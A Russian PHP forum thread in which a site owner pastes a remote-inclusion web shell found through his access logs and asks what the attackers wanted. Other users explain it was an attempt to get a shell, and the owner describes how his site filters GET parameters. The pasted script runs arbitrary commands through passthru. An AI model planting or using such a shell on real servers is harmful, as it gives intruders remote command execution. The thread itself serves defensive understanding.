За последние 24 часа нас посетили 21918 программистов и 1720 роботов. Сейчас ищут 843 программиста ...

Интересный Вопрос (забавно)

Тема в разделе "Прочие вопросы по PHP", создана пользователем Sergey M., 6 дек 2007.

  1. Sergey M.

    Sergey M. Активный пользователь

    С нами с:
    4 окт 2007
    Сообщения:
    7
    Симпатии:
    0
    Здравствуйте!

    Вот просматривал логи своего сайта и обнаружил забавные запросы:

    Если перейти вот по этому куску:

    То вот чего можно увидеть:

    PHP:
    1.  
    2.  
    3.   Se voce esta vendo este codigo quer dizer que a shell nao eh vulneravel.... :(
    4.   #=============================================================================
    5.  if (isset($chdir)) @chdir($chdir);
    6.   ob_start();
    7.    passthru("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
    8.   $output1 = "Shell OK!!\n";
    9.   $output = ob_get_contents();
    10.   echo $output1;
    11.   if (!empty($output)) echo str_replace(">", ">", str_replace("<", "<", $output));
    12.   #==============================================================================
    13.  #==============================================================================
    14. ?>
    15.  
    16.  
    Вообще такие варианты обращений к сайту у меня предусмотрены, но я могу тоже чего-то не знать.
    Господа, вопрос такой. Может сталкивался кто с этой ерундой?
    Или поскажите, чего они хотели?

    У меня весь GET проверяется, но может я чего недопонимаю? :?: :?: :?:
     
  2. QQQ

    QQQ Активный пользователь

    С нами с:
    21 ноя 2007
    Сообщения:
    538
    Симпатии:
    0
    Sergey M.
    шел хотели
    видимо используемый тобой скрипт когда-то имел уязвимость
    а может и теперь имеет :)
     
  3. Dagdamor

    Dagdamor Активный пользователь

    С нами с:
    4 фев 2006
    Сообщения:
    2.095
    Симпатии:
    1
    Адрес:
    Барнаул
  4. Sergey M.

    Sergey M. Активный пользователь

    С нами с:
    4 окт 2007
    Сообщения:
    7
    Симпатии:
    0
    Да это я понял. Скрипт самописный не бесплатный. Обработаны все запросы. Базу не использует. Ошибки запросов не обрабатываются через сервак, т.е. все отдается в браузер типа "нет такой страницы", а не "error on line".

    Мне смысл не понятен. Или это случайный запрос от нечего делать, или они в директории пробиться хотели.

    Последнее время ко многим сайтам цепляют троянов. Причем не только к сложным, но и к простейшим хомякам на switch case построеным, но без фильтрации GET-а.

    Вот я и думаю. может знает кто как это делается, а соответственно и метод защиты понятен будет.

    А через галерею - это дохлый номер.
     
  5. Sergey M.

    Sergey M. Активный пользователь

    С нами с:
    4 окт 2007
    Сообщения:
    7
    Симпатии:
    0
    Я читал. На сколько это реально если весь GET проходит

    htmlspecialchars();
    substr($x,0,...);
     
  6. Sergey89

    Sergey89 Активный пользователь

    С нами с:
    4 янв 2007
    Сообщения:
    4.796
    Симпатии:
    0
    Что должно хранится в $_GET['sam'] и как оно используеца? Можно пример кода (пару строчек, не больше).
     
  7. Sergey M.

    Sergey M. Активный пользователь

    С нами с:
    4 окт 2007
    Сообщения:
    7
    Симпатии:
    0
    Все в принцыпе не сложно:

    $_GET['sam']; - линкует весь сайт в зависимости от принимаемого значения. Работает через switch/case на последнем этапе обработки после приема значений обрезается до двух символов.

    $_GET['modul']; - линкует директории не входящие в основную систему. значение для него работает через if обрезан до восьми символов.

    Остальные пары являются внутренними для галереи и ВСЕ не зависимо надо не надо проходят htmlspecialchars();

    Я параноик :)